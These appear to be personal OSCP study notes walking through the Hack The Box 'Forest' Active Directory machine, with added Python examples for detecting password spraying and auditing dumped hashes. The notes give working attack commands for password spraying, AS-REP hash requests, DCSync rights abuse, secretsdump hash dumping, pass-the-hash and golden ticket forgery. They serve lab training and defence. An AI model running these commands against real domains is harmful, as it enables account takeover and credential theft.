OSCP Notes

Forest HTB (ippsec) - follow-through

  • try to expose SMB
  • try to expose host names with nslookup
    • the actual IP
  • ldapsearch -x -H ldap://IP -s base namingcontexts (find domain info)
  • ldapsearch -x -H ldap://IP -b "DC=htb,DC=local" '(objectClass=Person)' FILTERS (the attributes you want to see)
    • for the filter part you can put whatever you like, e.g. sAMAccountName
    • we can use user instead of Person, too
we can do a password spray once we get the account names.
awk '{print $2}' to print the second field.
make a user list with the valid users (no need to include the guest account or names that end with $ -- valid user names are generally short)
Let's crack them with passwords!
The password list should be short.
Months, Spring, Summer, Winter, Autumn, Fall, Password, Password123, [email protected], Secret
for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done
  • this adds year at the end of each word.
hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule
This will mutate the passwords and create a new password list.
  • add a ! at the end of each word
  • for i in $(cat pwlist.txt); do echo $i; echo ${i}\!; done
Another technique
  • hashcat --force --stdout pwlist.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u
    • this toggles the case of different letters; append | awk 'length($0) > 8' to keep only candidates longer than 8 characters
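The spray step above is what a blue team sees from the other side: one source failing logons against many different accounts in a short window, which looks nothing like a single user mistyping a password. The following is an added example (not from ippsec's video or these notes) that runs that detection over a constructed sample of failed-logon events; the simplified "timestamp source user" line format, the addresses and the account names other than svc-alfresco are all made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed domain logons (what a 4625 / "bad password"
# event reduces to): "<timestamp> <source IP> <target account>".
# Accounts and addresses are made up; this is not real log data.
SAMPLE_EVENTS = """\
2024-01-10T09:00:01 10.10.14.5 alice
2024-01-10T09:00:02 10.10.14.5 bob
2024-01-10T09:00:03 10.10.14.5 carol
2024-01-10T09:00:04 10.10.14.5 dave
2024-01-10T09:00:05 10.10.14.5 erin
2024-01-10T09:00:06 10.10.14.5 svc-alfresco
2024-01-10T09:30:00 10.10.14.9 andy
2024-01-10T09:30:10 10.10.14.9 andy
2024-01-10T09:30:20 10.10.14.9 andy
"""


def parse_events(text):
    """Turn the sample lines into (timestamp, source, user) tuples, skipping blanks."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, user = line.split()
        events.append((datetime.fromisoformat(ts), src, user))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return {source: sorted targeted users} for every source that failed against
    at least `min_users` distinct accounts within any `window`-long span.

    Spraying is one password against many users, so the signal is the number of
    distinct target accounts per source, not the number of failures: repeated
    failures against a single account (classic brute force, the second source
    in the sample) are deliberately not reported here."""
    by_source = defaultdict(list)
    for ts, src, user in sorted(events):
        by_source[src].append((ts, user))

    alerts = {}
    for src, evs in by_source.items():
        for i, (start, _) in enumerate(evs):
            # distinct accounts hit by this source in [start, start + window]
            users = {u for ts, u in evs[i:] if ts - start <= window}
            if len(users) >= min_users:
                alerts[src] = sorted(users)
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for src, users in detect_spray(parse_events(SAMPLE_EVENTS)).items():
        print(f"possible password spray from {src}: {len(users)} accounts: {', '.join(users)}")
```

The window and threshold are the knobs to tune against the domain's lockout policy (the same policy the notes dump below with --pass-pol): a spray that stays under the lockout threshold per account still produces many distinct targets per source, which is why this counts users rather than failures.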
Dump password policy
  • crackmapexec smb IP --pass-pol
  • crackmapexec smb IP --pass-pol -u '' -p '' (null authentication attempt)
  • enum4linux
Manual way to look up password policy
if the output shows something like that, it's doing RPC
do rpcclient -U '' IP
and after login:
  • enumdom
  • enumdomusers
  • queryusergroups 0x47b (RID)
  • querygroup GROUP_RID to see what kind of domain it is
  • queryuser RID to see password policies
Crack pass
crackmapexec smb IP -u userlist.out -p pwlist.out
Impacket GetNPUsers.py -dc-ip IP -request -format hashcat 'htb.local/'
looks for accounts that don't require Kerberos pre-authentication and dumps their hashes.
and crack the output
crackmapexec smb IP -u svc-alfresco -p s3rvice --shares
shows shares
Use evil-winrm
./evil-winrm.rb -u user -p pass -i IP
---> this should get you to the service-level shell

Priv Esc

On Kali:
  • download the zip file and the BloodHound application file separately.
  • After downloading, unzip the application file.
  • Download neo4j
neo4j console -> set a new password (default is neo4j) by visiting localhost:PORT
  • Now execute BloodHound with ./BloodHound --no-sandbox and log in
On the victim's machine, upload SharpHound.exe or run it from the mounted drive
./SharpHound.exe -c all
On kali,
  • drop the BloodHound zip file onto the browser window, which should start processing
In the search bar, type the user that you already know and mark it as owned
-> show paths from Owned Principals -> shows a map
If you see the Account Operators group, they can create users
On victim's,
net user gori gorigori /add /domain (gorigori is the password)
this should create an account.
net group "Exchange Windows Permissions" gori /add /domain
net group "Exchange Windows Permissions" /domain will verify that the user has been added.
On BloodHound, click the WriteDacl edge > Abuse Info
Add-DomainObjectAcl -Credential $cred -TargetIdentity testlab.local -Rights DCSync
This is a PowerView command.
Download the dev version of PowerSploit with -b dev on git clone
copy PowerView.ps1 over to the victim's machine.
$pass = ConvertTo-SecureString 'gorigori' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\gori', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity gori -Rights DCSync
Then on kali,
use impacket's secretsdump.py htb/gori:[email protected]
grab the NT hash (the last hash field in user:rid:lmhash:nthash:::) for the admin account

Crack the pass

crackmapexec smb IP -u administrator -H HASH
psexec.py htb.local/Administrator:[email protected]
This should get you a root shell.

Another way to crack

NTLM password cracking:

grep ::: hash.out | awk -F: '{print $1":"$4}' > new_hashes.out
and do
hashcat --user -m 1000 new_hashes.out rockyou.txt -r rules/InsidePro-PasswordsPro.rule
  • --user makes hashcat accept the "user:hash" format
  • --show prints the cracked results (with the user name when --user is given)
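The grep/awk one-liner above is a parser for secretsdump's user:rid:lmhash:nthash::: format. As an added example (not from ippsec or these notes), here is the same reduction in Python, plus the checks a defender runs on that dump before any cracking: accounts with an empty password, accounts that still have an LM hash stored, and NT hashes shared by several accounts (password reuse). The sample dump is constructed; the non-empty hash values are made-up hex, and only the empty-password LM/NT values are the real well-known constants.

```python
import re
from collections import defaultdict

# Well-known constants: LM hash and NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in secretsdump's "user:rid:lmhash:nthash:::" format.
# Non-empty hashes are made-up hex, not real credentials; the status
# lines mimic secretsdump output and must be ignored by the parser.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
htb.local\\svc-backup:1103:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
htb.local\\alice:1104:1122334455667788aabbccddeeff0011:89abcdef0123456789abcdef01234567:::
[*] Kerberos keys grabbed
"""

DUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_secretsdump(text):
    """Parse user:rid:lmhash:nthash::: lines; anything else (status messages,
    Kerberos keys) is skipped, exactly like `grep :::` in the notes."""
    entries = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if m:
            d = m.groupdict()
            d["rid"] = int(d["rid"])
            entries.append(d)
    return entries


def to_hashcat_lines(entries):
    """Same reduction as awk -F: '{print $1":"$4}': user:nthash for hashcat --user -m 1000."""
    return [f'{e["user"]}:{e["nt"]}' for e in entries]


def audit(entries):
    """Weak storage states worth reporting before (or instead of) cracking:
    empty passwords, LM hashes still stored, and NT hashes shared by accounts."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "reused": {h: users for h, users in by_nt.items() if len(users) > 1 and h != EMPTY_NT},
    }


if __name__ == "__main__":
    entries = parse_secretsdump(SAMPLE_DUMP)
    print("\n".join(to_hashcat_lines(entries)))
    for finding, value in audit(entries).items():
        print(f"{finding}: {value}")
```

Reuse between a privileged account and a service account is the finding that matters most: cracking one of the pair is unnecessary once the hashes match, which is also why the password-reuse check runs on the raw hashes rather than on cracked results.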

Golden Ticket method

copy the krbtgt hash.
On the victim's machine, run the following command to get the domain SID (for -domain-sid):
Get-ADDomain htb.local
Golden ticket
With Impacket examples:
# To generate the TGT with NTLM
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
# To generate the TGT with AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>
# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
# username can be anything.
  • an IP address should not be used for remote_hostname. Always add the host name to the hosts file.
if it says the time is wrong, we have to change our time --- nmap shows the clock skew.
date -s TIME
to change the time